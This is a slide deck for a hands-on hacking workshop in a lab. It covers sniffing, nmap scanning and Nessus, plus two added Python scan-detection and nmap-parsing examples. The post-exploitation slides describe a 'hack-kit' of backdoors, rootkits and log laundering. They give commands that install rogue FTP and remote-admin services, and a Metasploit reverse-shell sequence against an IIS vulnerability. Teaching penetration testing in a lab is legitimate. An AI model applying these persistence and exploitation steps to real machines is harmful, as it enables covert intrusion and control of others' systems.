Pwnage Workshop

From zero to hero: Level 1 ScriptKiddie

Table of contents
- Legal
- Overview
- Requirements
- Entering the Lab
- The scenario
- 5' intro to backtrack
- Lets get started

Legal
To be able to join this workshop you have to agree that you are completely responsible for what you do after you leave this room. We encourage you: don't use these tools and techniques to be evil.

Overview
This workshop is set in the early 2000s. Our aim is to let you know some hacking techniques, from basic networking to exploiting machines, through a hands-on workshop. Enjoy!

Requirements
- Human:
  1. Basic Microsoft Windows knowledge
  2. Basic Linux knowledge
  3. Basic Vmware knowledge
  4. Basic networking knowledge
  5. Patience
  6. Respect
  7. Then GOTO 5
- Hardware:
  - Computer/Laptop
  - 2+ GB RAM
  - Ethernet AND Wireless access
- Software:
  - Vmware
  - Virtualized version of Backtrack

Entering the Lab
- Identify your ethernet LAN network. Just plug your ethernet cable into the designated switch.
- Disable LAN TCP/IPv4 & IPv6.
- Open the Vmware Virtual Network Editor.
- Identify or create a network. Bridge it with your ethernet LAN.

Entering the Lab
- Go to your backtrack virtual machine and right click on the networking icon placed at the bottom right.
- Select custom, and select the name of the network bridged to the LAN.

Storyline

The scenario
- What you know.
  - There should be something behind the switch.
- What you don't know.
  - Everything else.

5' intro to backtrack
- The /pentest/ directory: most of the programs can be run from the shell.
- The desktop (run startx in a terminal): see multiple terminals at the same time, and also needed for running Maltego.

5' intro to backtrack
- Finding tools
  - The $PATH
    echo $PATH
  - The find command
    root@bt:~# find / -name nmap
    root@bt:~# find /pentest/ -name '*.dic'
- Terminate a running program: Control + C
- And of course TAB for autocompleting and the arrow keys to reuse your previously typed commands.

Lets get started
- Challenge 1: Obtain IP address.
- Challenge 2: Detect/Define our victim.
- Challenge 3: Service recognition.
- Challenge 4: Vulnerability detection.
- Challenge 5: Exploiting vulnerability.
- Challenge 6: Gain remote access.
- Challenge 7: Remote network recognition.
- Challenge 8: Exploiting Remote machines.

Challenge 1: Obtain IP address.
So you are in the middle of, I don't know, you just connected your plug and nothing happened. What can we do?
- Logging in to Backtrack
  - For user/pass read the welcome screen in BT
- Bringing up your Ethernet interface
  - ifconfig eth0 up
- Assigning the right IP address to your pc.

Challenge 1: Obtain IP address.
First we listen. To be able to obtain a valid IP we can listen on the network and see if it gives us some hint of which is the right IP range.
- Intro to Network Sniffers
  - What are sniffers?
  - Promiscuous mode
- Sniffing with Tcpdump

Challenge 1: Obtain IP address.
- Intro to Network Sniffers
  - What are sniffers?
  - Promiscuous mode

Challenge 1: Obtain IP address.
- Sniffing with tcpdump
  - List devices
    root@bt:~# tcpdump -D
    1.eth0
    2.usbmon1 (USB bus number 1)
    3.any (Pseudo-device that captures on all interfaces)
    4.lo
  - Select the right device and start listening
    root@bt:~# tcpdump -i eth0
    tcpdump: WARNING: eth0: no IPv4 address assigned
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
  - See something? See too much? Try filters
    root@bt:~# tcpdump -n arp -i eth0
    root@bt:~# tcpdump -n tcp -i eth0
    root@bt:~# tcpdump -n tcp and dst port 23 -i eth0

Challenge 1: Obtain IP address.
You found the right IP range!!!
- Set up your ip address
  root@bt:~# ifconfig eth0 192.168.1.6/24


Challenge 2: Detect/Define our victim.
- The art of scanning:
  - What is scanning
  - Ping? Pong!
  - Dissection of a scan one packet at a time.
- Netcat, nmap, amap.

Challenge 2: Detect/Define our victim.
- What is scanning
- Ping? Pong!
- Ping sweep: A method that can establish a range of IP addresses which map to live hosts.
- Example: nmap -sn 192.168.69.0/24
  Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-14 15:58 EDT
  Nmap scan report for 192.168.69.1
  Host is up (0.0023s latency).
  MAC Address: 00:21:29:AA:A6:89 (Cisco-Linksys)
  Nmap scan report for 192.168.69.104
  Host is up (0.0031s latency).
  MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
  Nmap scan report for 192.168.69.145
  Host is up.
  Nmap done: 256 IP addresses (3 hosts up) scanned in 3.48 seconds

Challenge 2: Detect/Define our victim.
- Dissection of a ping sweep one packet at a time.
(Wireshark: View of a Ping sweep)

Challenge 2: Detect/Define our victim.
- Now it's your time, find your victim.


Challenge 3: Service recognition.
- Ports & port scanning.
- Services
  - What are services
  - Detecting services
  - Banner recognition

Challenge 3: Service recognition.
- Ports
- Port: A port is an application serving as a communications endpoint. It is used by the transport protocols of the Internet Protocol Suite, such as Transmission Control Protocol (TCP) and User Datagram Protocol (UDP).
- The port numbers are divided into three ranges: the Well Known Ports, the Registered Ports, and the Dynamic and/or Private Ports.
  - The Well Known Ports are those from 0 through 1023 (ftp, telnet, tftp).
  - The Registered Ports are those from 1024 through 49151 (socks, ms-sql, mysql).
  - The Dynamic and/or Private Ports are those from 49152 through 65535.
- TCP & UDP: http://www.iana.org/assignments/port-numbers

Challenge 3: Service recognition.
- Port Scanning
  root@bt:~# nmap -n -p1-65535 192.168.69.104
  Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:07 EDT
  Nmap scan report for 192.168.69.104
  Host is up (0.041s latency).
  Not shown: 65533 closed ports
  PORT   STATE SERVICE
  22/tcp open  ssh
  80/tcp open  http
  MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
  Nmap done: 1 IP address (1 host up) scanned in 37.48 seconds

Challenge 3: Service recognition.
- 3 way handshake
(Wireshark port scan capture)
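The ping sweep and the port scan dissected in the two Wireshark captures above leave the same fingerprint on the wire that a defender looks for: one source sending ICMP echo requests to many hosts, or pure SYNs to many ports of one host. This added Python example (not part of the workshop material) runs that detection over constructed tcpdump -n style lines; the thresholds, addresses and ports are assumptions.

```python
import re
from collections import defaultdict

# Constructed tcpdump -n style lines, not a capture from the lab: a ping sweep
# from .145, a SYN scan from .145 against .104, and one benign single SYN.
SAMPLE_LINES = [
    "15:58:01.000100 IP 192.168.69.145 > 192.168.69.1: ICMP echo request, id 1, seq 1, length 8",
    "15:58:01.000200 IP 192.168.69.1 > 192.168.69.145: ICMP echo reply, id 1, seq 1, length 8",
    "15:58:01.000300 IP 192.168.69.145 > 192.168.69.2: ICMP echo request, id 1, seq 2, length 8",
    "15:58:01.000400 IP 192.168.69.145 > 192.168.69.3: ICMP echo request, id 1, seq 3, length 8",
    "15:58:01.000500 IP 192.168.69.145 > 192.168.69.104: ICMP echo request, id 1, seq 4, length 8",
    "15:07:02.000100 IP 192.168.69.145.40001 > 192.168.69.104.21: Flags [S], seq 1, win 1024, length 0",
    "15:07:02.000200 IP 192.168.69.145.40002 > 192.168.69.104.22: Flags [S], seq 2, win 1024, length 0",
    "15:07:02.000300 IP 192.168.69.104.22 > 192.168.69.145.40002: Flags [S.], seq 9, ack 3, win 5840, length 0",
    "15:07:02.000400 IP 192.168.69.145.40003 > 192.168.69.104.23: Flags [S], seq 3, win 1024, length 0",
    "15:07:02.000500 IP 192.168.69.145.40004 > 192.168.69.104.80: Flags [S], seq 4, win 1024, length 0",
    "15:07:02.000600 IP 192.168.69.145.40005 > 192.168.69.104.443: Flags [S], seq 5, win 1024, length 0",
    "15:07:03.000100 IP 192.168.69.1.53000 > 192.168.69.104.80: Flags [S], seq 7, win 5840, length 0",
]

IPV4 = r"(\d+\.\d+\.\d+\.\d+)"
ICMP_REQ = re.compile(rf"IP {IPV4} > {IPV4}: ICMP echo request")
# "Flags [S]" only: a SYN-ACK reply prints as "Flags [S.]" and must not count.
TCP_SYN = re.compile(rf"IP {IPV4}\.(\d+) > {IPV4}\.(\d+): Flags \[S\]")


def detect_scans(lines, sweep_hosts=3, scan_ports=4):
    """Return sources that pinged >= sweep_hosts distinct hosts (ping sweep)
    and (src, dst) pairs that SYN'ed >= scan_ports distinct ports (port scan)."""
    echo_targets = defaultdict(set)   # src -> hosts it sent echo requests to
    syn_targets = defaultdict(set)    # (src, dst) -> ports it sent SYNs to
    for line in lines:
        m = ICMP_REQ.search(line)
        if m:
            echo_targets[m.group(1)].add(m.group(2))
            continue
        m = TCP_SYN.search(line)
        if m:
            syn_targets[(m.group(1), m.group(3))].add(int(m.group(4)))
    return {
        "ping_sweep": {src: len(hosts) for src, hosts in echo_targets.items()
                       if len(hosts) >= sweep_hosts},
        "port_scan": {pair: sorted(ports) for pair, ports in syn_targets.items()
                      if len(ports) >= scan_ports},
    }


if __name__ == "__main__":
    print(detect_scans(SAMPLE_LINES))
```

The same counters applied per time window give a cheap alert for the nmap -sn and nmap -p1-65535 runs shown on these slides.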

Challenge 3: Service recognition.
- Services:
- Some services: ssh, web, authentication, dns, email, snmp, ftp, proxy, dhcp, tftp.

Challenge 3: Service recognition.
- Banner recognition
  root@bt:~# nmap -n -p22 -sV 192.168.69.104
  Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:40 EDT
  Nmap scan report for 192.168.69.104
  Host is up (0.0020s latency).
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 5.1p1 Debian 8 (protocol 2.0)
  MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
  Service Info: OS: Linux
  Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

Challenge 3: Service recognition.
(Wireshark service detection capture)

Challenge 3: Service recognition.
- Closing chapter 3
- After you got the results, let's build a general picture of them:
  - How many machines?
  - Which OSs?
  - Which ports?
  - Which services?
  - Which software?
  - Are they server or desktop machines?
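The closing questions above are answered from the nmap normal output shown on the previous slides. This added Python example (not part of the workshop) parses that output format into host records and summarizes machines, open ports, software and OS; the sample text is constructed here by combining the host list of the -sn run with the port lines of the -p and -sV runs into one report.

```python
import re

# Constructed nmap normal-output excerpt modelled on the slides' scan results.
SAMPLE_NMAP = """\
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:40 EDT
Nmap scan report for 192.168.69.1
Host is up (0.0023s latency).
MAC Address: 00:21:29:AA:A6:89 (Cisco-Linksys)
Nmap scan report for 192.168.69.104
Host is up (0.0020s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.1p1 Debian 8 (protocol 2.0)
80/tcp   open  http
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Service Info: OS: Linux
Nmap scan report for 192.168.69.145
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.48 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-F:]{17}) \((.*)\)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
OS_RE = re.compile(r"^Service Info: OS: (.*)")


def parse_nmap(text):
    """Turn nmap normal output into a list of host dicts (ip, mac, vendor, os, ports)."""
    hosts, cur = [], None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            cur = {"ip": m.group(1), "mac": None, "vendor": None, "os": None, "ports": []}
            hosts.append(cur)
        elif cur is None:
            continue                      # header lines before the first host
        elif m := MAC_RE.match(line):
            cur["mac"], cur["vendor"] = m.group(1), m.group(2)
        elif m := OS_RE.match(line):
            cur["os"] = m.group(1).strip()
        elif (m := PORT_RE.match(line)) and m.group(3) == "open":
            cur["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                 "service": m.group(4), "version": m.group(5).strip()})
    return hosts


def summarize(hosts):
    """Answer the closing-chapter questions: how many machines, which ports, software, OS."""
    return {
        "machines": len(hosts),
        "open_ports": sorted({p["port"] for h in hosts for p in h["ports"]}),
        "software": sorted(p["version"] for h in hosts for p in h["ports"] if p["version"]),
        "os": sorted({h["os"] for h in hosts if h["os"]}),
    }


if __name__ == "__main__":
    print(summarize(parse_nmap(SAMPLE_NMAP)))
```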

Challenge 3: Service recognition.
2 Free TIPs
- Browsing the services
  - Browse 2 common services with their corresponding client
  - Use netcat to connect to the services
- Why don't we try to recognize the OS running on each machine? Try: nmap -O host


Challenge 4: Vulnerability detection.
- What are vulnerabilities
  - IETF RFC 2828 defines vulnerability as: "A flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy."
- Playing with Nessus
  - What is Nessus
  - Installing Nessus on Backtrack
  - Creating policies
  - Understanding the results

Challenge 4: Vulnerability detection.
- Playing with Nessus
  - What is Nessus: it is a vulnerability scanner, bla bla bla.
  - Installing Nessus on backtrack: We are going to connect our backtrack machine to the public internet in order to retrieve Nessus from their home site.
    - Unbridge and bridge to your wireless
    - dhcpclient
    - Nessus.org register (as home user)
    - Obtain your code (check inbox)
    - Paste the command in a shell
    - Go to create user
    - Rebridge to your ethernet
    - Re-set to your first ip
    - Nessus start
    - Browse into https://yourip:8834

Challenge 4: Vulnerability detection.
- Playing with Nessus
  - What is Nessus
  - Installing Nessus on backtrack
  - Creating policies
    - The Nessus interface is kind of intuitive.
    - Take 5 minutes to create your own policy (keep in mind the results from the previous stages).
    - Now after you did it, please don't forget to also include the following plugins:
      - CGI abuses
      - RPC
      - Web Servers
      - Windows

Challenge 4: Vulnerability detection.
- Playing with Nessus
  - Installing Nessus on backtrack
  - Creating policies
  - Understanding the results
    - If results != 0 then go read them; again, take your time.
    - From the results, which machines are vulnerable?


Challenge 5: Exploiting vulnerability.
- Creating your hack-kit
- Using exploits:
  - Simple exploits
  - The Metasploit framework

Challenge 5: Exploiting vulnerability.
- Creating your hack-kit
  A hack-kit is your own set of tools for backdooring/administrating/protecting your new server, which you will upload after you break into a server. In general you would like to upload:
  - Process/services tools: list/kill processes.
  - File transfer tools: normally an FTP.
  - Administration tools: access to remote desktop.
  - Maintaining access: backdoors.
  - Hiding your stuff: rootkits.
  - Covering tracks: log laundry.
  - Expansion tools: scanners and more exploits.
  - Hardening: patches, service packs.

Challenge 5: Exploiting vulnerability.
Proposed tools
- Listing/killing processes and port scanning, as well as starting remote reconnaissance. These tools let you take a look from the command line at who is running on the remote server. Fport 2.0:
  - Fport.exe
  - KILL.EXE
  - TLIST.EXE
  - dfind.exe
- Rogue FTP-server: simple and powerful FTP server
  - WINMGNT.EXE
  - ServUDaemon.ini
- Rogue Remote Administration tool: if you want remote desktop, here is a solution; telnet and file transfer capabilities included as well
  - AdmDll.dll
  - raddrv.dll
  - r_server.exe
  - settings.reg
- Client/Administration tools: let you administrate your rogue services remotely
  - Remote administrator 2.1
  - Serv-u administrator 3

Challenge 5: Exploiting vulnerability.
- How to use the tools.
  - Installing rogue services: the important capability of these rogue services is that they can be installed as services, from the command line.
- So once you are in the remote shell, transfer your hackkit (pack.exe) and run the following commands.

Challenge 5: Exploiting vulnerability.
- Running the pack.exe (self extraction)
  C:\WINNT\system32>pack
  C:\WINNT\system32>dir winmgnt.exe
   Volume in drive C has no label.
   Volume Serial Number is 2A1C-0AF4
   Directory of C:\WINNT\system32
  12/27/2003  01:22p             496.836 Winmgnt.exe
                 1 File(s)        496.836 bytes
                 0 Dir(s)   4.066.122.944 bytes free
- Installing the tools as services in the remote machine
  C:\WINNT\system32>winmgnt /i
  C:\WINNT\system32>regedit /s temp.reg
  C:\WINNT\system32>sqlsvc /install /silence
- Starting your rogue tools as services
  C:\WINNT\system32>net start serv-u
  The Serv-U FTP Server service is starting.
  The Serv-U FTP Server service was started successfully.
  C:\WINNT\system32>net start r_server
  The Remote Administrator Service service is starting.
  The Remote Administrator Service service was started successfully.
  C:\WINNT\system32>
- Now you are able to use that remote machine at your own will, running an FTP server and with access to the desktop.

Challenge 5: Exploiting vulnerability.
- What are exploits.
- Why they are funny.
- Where you can find them.
- How to use them.
  - Compiling
  - Testing
  - Executing

Challenge 5: Exploiting vulnerability.
- What are exploits.
  An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic. This frequently includes such things as gaining control of a computer system, allowing privilege escalation or a denial of service attack.
  Types: Exploits are commonly categorized and named by these criteria:
  - The type of vulnerability they exploit.
  - Whether they need to be run on the same machine as the program that has the vulnerability (local) or can be run on one machine to attack a program running on another machine (remote).
  - The result of running the exploit (remote access, DoS, data leak, privilege escalation, etc.).

Challenge 5: Exploiting vulnerability.
- What are exploits.
- Why they are funny.
  - Because they could give us unauthorized access to something (data, remote machine, and/or become administrator).

Challenge 5: Exploiting vulnerability.
How an exploit looks like.

Challenge 5: Exploiting vulnerability.
Meanwhile in a very very very secure server.

Challenge 5: Exploiting vulnerability.
Back to our very very very secure server. Well, you bad service, you spat out a file and then went to sleep? Come on. Thanks for the info.

Challenge 5: Exploiting vulnerability.
- Where you can find them.
  There are multiple sites; one of them is exploit-db.com, with a huge list of exploits for multiple pieces of software.

Challenge 5: Exploiting vulnerability.
- Some other things about exploits:
  - Public exploits vs private exploits.
  - Open source vs closed/compiled ones.
  - Protected.
  - Fakes, booby traps and rootkitted ones.
- And we also have Metasploit.

Challenge 5: Exploiting vulnerability.
Using Metasploit
- Setting up metasploit to attack a machine: select the exploit, the victim, and what you want to do on that machine.
  - First, you have to know the module name (it's on the nessus output)
  - Run metasploit
    /pentest/exploits/framework3/msfconsole
  - Search for the exploit
    show exploits
  - Start using the exploit
    info windows/iis/ms01_026_dbldecode
    use windows/iis/ms01_026_dbldecode
  - Ask for the config
    show options
  - Minimum requirements
    set RHOST 192.168.1.11
  - Set the payload
    set payload /generic/shell_reverse_tcp
  - Ask for the config
    set LHOST YOURIP
  - Exploit! NOW WHAAAAAAAAAAAAAAAAAAAATTTTTTT
  - Profit.

Challenge 6: Gain remote access.
You hacked it, now what?
- Installing channels or something, right: serv-u, remote administrator, netcat.

Challenge 7: Remote network recognition.
We have to go deeper
- Scanning the LAN: here we are going to use some tool from our hackkit, dfind.

Challenge 8: Exploiting Remote machines.
- So you detected some machines, you detected some services, now it's time to exploit them.
- What tools can we use to exploit remote vulnerabilities?

Challenge 8: Exploiting Remote machines.
- Exploiting remote Windows Machines
  - Analyzing dfind results
  - Searching for the vulnerability's available info
  - Prepare the exploit
  - Profit

Challenge 8: Exploiting Remote machines.
- Exploiting remote Linux Machines
  - Analyzing dfind results
  - Searching for the vulnerability's available info
  - Prepare the exploit
  - Profit

Challenge 8: Exploiting Remote machines.
Once you have one
- Man in the middle attacks (ettercap)
- DNS poisoning
- Exploiting browsers

Super Secret Network Topology (diagram)

Machines and their vulnerabilities
- Exploiting Windows NT 4 from Nessus to Metasploit (IIS).
- Hacking windows 2000: Backtrack, Nessus, Metasploit autopwn: KABOOM!!!
- Red Hat 6.2: Wu-ftpd v2.6.0 remote root exploit, 7350wu.c.
